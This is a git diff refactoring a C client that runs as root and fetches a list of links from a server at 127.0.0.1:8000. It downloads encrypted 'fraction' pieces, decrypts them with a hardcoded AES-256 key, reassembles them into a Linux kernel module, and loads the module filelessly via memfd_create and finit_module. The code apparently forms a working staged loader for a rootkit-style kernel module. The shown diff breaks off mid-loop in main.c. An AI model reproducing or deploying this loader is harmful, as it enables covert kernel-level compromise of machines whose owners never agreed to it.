diff --git a/client/client b/client/client index b49feaf..9da6a16 100755 Binary files a/client/client and b/client/client differ diff --git a/client/include/cipher.h b/client/include/cipher.h index a356bfe..7ee6f78 100644 --- a/client/include/cipher.h +++ b/client/include/cipher.h @@ -14,10 +14,12 @@ #include typedef struct{ - unsigned char *decryptedtext; + unsigned char *decrypted_text; size_t text_size; -} decrypted; +} decrypted_t; -decrypted *decrypt_fraction(fraction_t *fraction); +decrypted_t *decrypt_fraction(fraction_t *fraction); char *generate_publickey(void); +void decrypted_free(decrypted_t *decrypted); + #endif diff --git a/client/include/load.h b/client/include/load.h index 6703306..56e8e48 100644 --- a/client/include/load.h +++ b/client/include/load.h @@ -1,18 +1,16 @@ +#include #define _GNU_SOURCE #include +#include +#include #include #include -#include -#include -#include -#include #include +#include -#include "../include/log.h" #include "../include/cipher.h" +#include "../include/log.h" -int load_lkm(const unsigned char* lkm, ssize_t total_size); -int is_lkm_loaded(const char *name); -int remove_lkm(); -int create_lkm(int num_links,fraction_t *fractions); +uint8_t *decrypt_lkm(fraction_t *fractions, int fractions_count, ssize_t *len); +int load_lkm(const uint8_t *lkm, ssize_t total_size); diff --git a/client/src/cipher.c b/client/src/cipher.c index db39723..2b82325 100644 --- a/client/src/cipher.c +++ b/client/src/cipher.c @@ -2,88 +2,98 @@ #include "../include/fraction.h" #include #include +#include -decrypted decryptedstr; - -void handleErrors(void) -{ - ERR_print_errors_fp(stderr); - abort(); +static void handle_errors(void) { + ERR_print_errors_fp(stderr); + abort(); } -int decrypt(unsigned char *ciphertext, int ciphertext_len, unsigned char *key, +static int decrypt(unsigned char *ciphertext, int ciphertext_len, unsigned char *key, unsigned char *iv, unsigned char *plaintext) { - EVP_CIPHER_CTX *ctx; - int len; - int plaintext_len; + EVP_CIPHER_CTX *ctx; + int len; + int plaintext_len; - if (!(ctx = EVP_CIPHER_CTX_new())) - handleErrors(); + if (!(ctx = EVP_CIPHER_CTX_new())) + handle_errors(); - if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv)) - handleErrors(); + if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv)) + handle_errors(); - if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len)) - handleErrors(); - plaintext_len = len; + if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len)) + handle_errors(); + plaintext_len = len; - if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) - handleErrors(); - plaintext_len += len; + if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) + handle_errors(); + plaintext_len += len; - EVP_CIPHER_CTX_free(ctx); + EVP_CIPHER_CTX_free(ctx); - return plaintext_len; + return plaintext_len; } -decrypted *decrypt_fraction(fraction_t *fraction){ + +decrypted_t *decrypt_fraction(fraction_t *fraction) { size_t decrypted_size; - unsigned char key[32] = { - 0x6d, 0x46, 0x75, 0x32, 0x4c, 0x2f, 0x69, 0x34, 0x78, 0x65, 0x76, 0x4a, - 0x34, 0x4e, 0x33, 0x36, 0x72, 0x44, 0x74, 0x35, 0x35, 0x5a, 0x4f, 0x34, - 0x35, 0x4b, 0x63, 0x72, 0x6e, 0x30, 0x75, 0x57 -}; + unsigned char key[32] = {0x6d, 0x46, 0x75, 0x32, 0x4c, 0x2f, 0x69, 0x34, + 0x78, 0x65, 0x76, 0x4a, 0x34, 0x4e, 0x33, 0x36, + 0x72, 0x44, 0x74, 0x35, 0x35, 0x5a, 0x4f, 0x34, + 0x35, 0x4b, 0x63, 0x72, 0x6e, 0x30, 0x75, 0x57}; + + unsigned char *decrypted_text = malloc(fraction->data_size); + + if (decrypted_text == NULL) { + log_error("Cannot assign memory for the decrypted text"); + return NULL; + } - unsigned char *decryptedtext = malloc(fraction->data_size+1); + decrypted_size = decrypt((unsigned char *)fraction->data, fraction->data_size, + key, (unsigned char *)fraction->iv, decrypted_text); - if (decryptedtext == NULL) { - fprintf(stderr, "Cannot assign memory for the decrypted text.\n"); - return NULL; - } + decrypted_t *decr = malloc(sizeof(decrypted_t)); - decrypted_size = decrypt((unsigned char*)fraction->data, fraction->data_size, key, (unsigned char*) fraction->iv, decryptedtext); + if (decr == NULL) { + log_error("Could not allocate memory for decrypted struct"); + return NULL; + } - decryptedstr.decryptedtext = decryptedtext; - decryptedstr.text_size = decrypted_size; + decr->decrypted_text = decrypted_text; + decr->text_size = decrypted_size; + return decr; +} - return &decryptedstr; +void decrypted_free(decrypted_t *decrypted) { + free(decrypted->decrypted_text); + free(decrypted); } -char *generate_publickey(void){ +char *generate_publickey(void) { EVP_PKEY *pkey = NULL; EVP_PKEY_CTX *pctx = NULL; pctx = EVP_PKEY_CTX_new_from_name(NULL, "RSA", NULL); - if(pctx == NULL){ - handleErrors(); + if (pctx == NULL) { + handle_errors(); return NULL; } - if(EVP_PKEY_keygen_init(pctx) <= 0){ - handleErrors(); + if (EVP_PKEY_keygen_init(pctx) <= 0) { + handle_errors(); EVP_PKEY_CTX_free(pctx); return NULL; } - if(EVP_PKEY_CTX_set_rsa_keygen_bits(pctx, 2048) <= 0){ - handleErrors(); + if (EVP_PKEY_CTX_set_rsa_keygen_bits(pctx, 2048) <= 0) { + handle_errors(); EVP_PKEY_CTX_free(pctx); return NULL; } - if(EVP_PKEY_generate(pctx, &pkey) <= 0){ - handleErrors(); + if (EVP_PKEY_generate(pctx, &pkey) <= 0) { + handle_errors(); EVP_PKEY_CTX_free(pctx); return NULL; } @@ -91,17 +101,18 @@ char *generate_publickey(void){ BIO *bio = BIO_new(BIO_s_mem()); - if(PEM_write_bio_PUBKEY(bio,pkey) <= 0){ - handleErrors(); + if (PEM_write_bio_PUBKEY(bio, pkey) <= 0) { + handle_errors(); EVP_PKEY_free(pkey); BIO_free(bio); return NULL; } char *pem_key = NULL; - long pem_len = BIO_get_mem_data(bio,&pem_key); - + long pem_len = BIO_get_mem_data(bio, &pem_key); + char *copy = malloc(pem_len); + memcpy(copy, pem_key, pem_len); BIO_free(bio); -return pem_key; + return copy; } diff --git a/client/src/fraction.c b/client/src/fraction.c index 3a17285..bebee40 100644 --- a/client/src/fraction.c +++ b/client/src/fraction.c @@ -9,13 +9,13 @@ int download_fraction(int sfd, char *url, fraction_t *fraction) { // Parse the URL to get the path path = get_path_from_url(url); if (!path) { - log_error("Invalid URL: %s\n", url); + log_error("Invalid URL: %s", url); return 1; } // Perform the HTTP GET request if (http_get(sfd, path, &res) != HTTP_SUCCESS) { - log_error("Failed to download: %s\n", url); + log_error("Failed to download: %s", url); return 1; } @@ -45,7 +45,7 @@ int fraction_parse(char *data, size_t size, fraction_t *fraction) { // Ensure the data size is sufficient if (size < HEADER_SIZE) { - log_error("Insufficient size: %lu\n", size); + log_error("Insufficient size: %lu", size); return 1; } @@ -59,7 +59,7 @@ int fraction_parse(char *data, size_t size, fraction_t *fraction) { // Check the magic number if (!check_magic(magic)) { - log_error("Wrong magic number: %02x\n", magic); + log_error("Wrong magic number: %02x", magic); return 1; } @@ -67,7 +67,7 @@ int fraction_parse(char *data, size_t size, fraction_t *fraction) { data_size = size - HEADER_SIZE; fraction->data = malloc(data_size); if (!fraction->data) { - log_error("Failed to allocate data for fraction\n"); + log_error("Failed to allocate data for fraction"); return 1; } // Set the extracted values in the fraction structure diff --git a/client/src/http.c b/client/src/http.c index 14639c9..29f9de6 100644 --- a/client/src/http.c +++ b/client/src/http.c @@ -199,12 +199,12 @@ int http_get(int sfd, const char *path, http_res_t *res) { req_buf_len = strlen(request_buf); if (send_request(sfd, request_buf) < 0) { - log_error("Error: failed to send request\n"); + log_error("Error: failed to send request"); err = HTTP_SOCKET_ERR; goto error; } - log_debug("Sent GET request\n"); + log_debug("Sent GET request"); res->request = malloc(req_buf_len + 1); if (res->request == NULL) { diff --git a/client/src/load.c b/client/src/load.c index 7b0a58b..0c7c3e4 100644 --- a/client/src/load.c +++ b/client/src/load.c @@ -1,109 +1,87 @@ #include "../include/load.h" #include "../include/cipher.h" +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include -int remove_lkm(){ +#include +#include - char command[10] = "rmmod lkm"; +uint8_t *decrypt_lkm(fraction_t *fractions, int fractions_count, ssize_t *len) { - int result = system(command); - if(result == -1){ - log_error("Error executing rmmod"); - return -1; - } - return WEXITSTATUS(result); -} - -int is_lkm_loaded(const char* name){ - - DIR *dir = opendir("/sys/module/"); - - if(!dir){ - log_error("Error opening the /sys/module directory"); - return -1; - } - - struct dirent *entry; - - while ((entry = readdir(dir)) != NULL){ - if(strcmp(entry->d_name, name) == 0){ - closedir(dir); - puts("Module already loaded!"); - return 1; - } - } - - closedir(dir); - return 0; - -} - -int load_lkm(const unsigned char *lkm,ssize_t total_size){ - - int fdlkm = memfd_create("lkmmod", 0); - if (fdlkm < 0) { - log_error("memfd_create failed"); - return -1; - } - ssize_t written_bytes = write(fdlkm, lkm, total_size); - if (written_bytes < 0) { - log_error("Error writing to memfd"); - close(fdlkm); - return -1; - } else if (written_bytes != total_size) { - log_error("Incomplete write to memfd (Expected %zu, wrote %zd)\n)", total_size, written_bytes); - close(fdlkm); - return -1; - } - if (syscall(SYS_finit_module, fdlkm, "", 0) != 0) { - log_error("Failed to init module"); - close(fdlkm); - return -1; - } - - printf("Module loaded successfully\n"); - close(fdlkm); - - return 0; -} - -int create_lkm(int num_links,fraction_t *fractions){ - - unsigned char *module = NULL; + uint8_t *module = NULL; ssize_t total_size = 0; ssize_t module_size = 0; - decrypted *decrstr; + decrypted_t *decr; - for (int i = 0; i < num_links; i++) { - - decrstr = decrypt_fraction( &fractions[i]); - if (decrstr -> decryptedtext == NULL) { + for (int i = 0; i < fractions_count; i++) { + decr = decrypt_fraction(&fractions[i]); + if (decr == NULL) { log_error("Decryption process failed"); - return -1; + return NULL; } + if (module == NULL) { - total_size = decrstr -> text_size; + total_size = decr->text_size; module = malloc(total_size); if (module == NULL) { log_error("Error in memory assigning"); - return -1; + decrypted_free(decr); + return NULL; } - } else if (module_size + decrstr -> text_size > total_size) { - total_size += decrstr -> text_size; - unsigned char * tmp = realloc(module, total_size); + } else { + total_size += decr->text_size; + uint8_t *tmp = realloc(module, total_size); if (tmp == NULL) { log_error("Memory reallocation failed"); - return -1; + free(module); + decrypted_free(decr); + return NULL; } module = tmp; } - memcpy(module + module_size, decrstr -> decryptedtext, decrstr -> text_size); - module_size += decrstr -> text_size; + memcpy(module + module_size, decr->decrypted_text, decr->text_size); + module_size += decr->text_size; + + decrypted_free(decr); } - if(load_lkm(module, total_size) < 0){ - log_error("There was an error loading the LKM"); + *len = module_size; + return module; +} + +int load_lkm(const uint8_t *lkm, ssize_t total_size) { + + int fdlkm = syscall(SYS_memfd_create, "lkmmod", 0); + if (fdlkm < 0) { + log_error("memfd_create failed"); + return -1; + } + + ssize_t written_bytes = write(fdlkm, lkm, total_size); + if (written_bytes < 0) { + log_error("Error writing to memfd"); + close(fdlkm); + return -1; + } else if (written_bytes != total_size) { + log_error("Incomplete write to memfd (Expected %zu, wrote %zd)", + total_size, written_bytes); + close(fdlkm); + return -1; } + if (syscall(SYS_finit_module, fdlkm, "", 0) != 0) { + log_error("Failed to init module"); + close(fdlkm); + return -1; + } + + log_debug("Module loaded successfully"); + close(fdlkm); return 0; } diff --git a/client/src/main.c b/client/src/main.c index 68251f4..ac1fed6 100644 --- a/client/src/main.c +++ b/client/src/main.c @@ -4,18 +4,16 @@ #include "../include/fraction.h" #include "../include/http.h" +#include "../include/load.h" +#include "../include/log.h" #include "../include/sock.h" #include "../include/utils.h" -#include "../include/log.h" -#include "../include/load.h" - #define SERVER_IP "127.0.0.1" #define SERVER_PORT "8000" -#define SYS_init_module __NR_init_module /* Helper functions to assist with cleanup, I hate cleanup */ -static void cleanup_char_array(char **array, int n_elem) { +static void cleanup_string_array(char **array, int n_elem) { for (int i = 0; i < n_elem; i++) { free(array[i]); } @@ -36,10 +34,11 @@ int main(void) { http_res_t http_post_res = {0}; char **fraction_links = NULL; fraction_t *fractions = NULL; - int module; + uint8_t *module = NULL; + ssize_t module_size; - if(geteuid() != 0){ - fprintf(stderr,"This program needs to be run as root!\n"); + if (geteuid() != 0) { + log_error("This program needs to be run as root!\n"); exit(1); } @@ -59,22 +58,29 @@ int main(void) { } freeaddrinfo(ainfo); - if (http_post(sfd, "/aeskey","text/plain",generate_publickey(),&http_post_res) != HTTP_SUCCESS) { - log_error("Failed to send RSA Public Key\n"); - goto cleanup; - } + //if (http_post(sfd, "/aeskey", "text/plain", generate_publickey(), + // &http_post_res) != HTTP_SUCCESS) { + // log_error("Failed to send RSA Public Key\n"); + // goto cleanup; + //} + if (http_get(sfd, "/", &http_fraction_res) != HTTP_SUCCESS) { log_error("Failed to retrieve fraction links\n"); goto cleanup; } + log_debug("Retrieved fraction links"); + int num_links = count_lines(http_fraction_res.data) + 1; - fraction_links = calloc(num_links,sizeof(char *)); + log_debug("%d links found", num_links); + + fraction_links = calloc(num_links, sizeof(char *)); if (!fraction_links) { log_error("Failed to allocate memory for fraction links\n"); goto cleanup; } + int lines_read = split_fraction_links(http_fraction_res.data, fraction_links, num_links); if (lines_read < 0) { @@ -82,7 +88,6 @@ int main(void) { goto cleanup; } - fractions = malloc(lines_read * sizeof(fraction_t)); if (!fractions) { log_error("Failed to allocate memory for fractions\n"); @@ -103,21 +108,32 @@ int main(void) { log_error("Fractions check failed\n"); goto cleanup; } - log_info("Verified fractions"); + log_info("Verified fractions"); - for (int i=0; i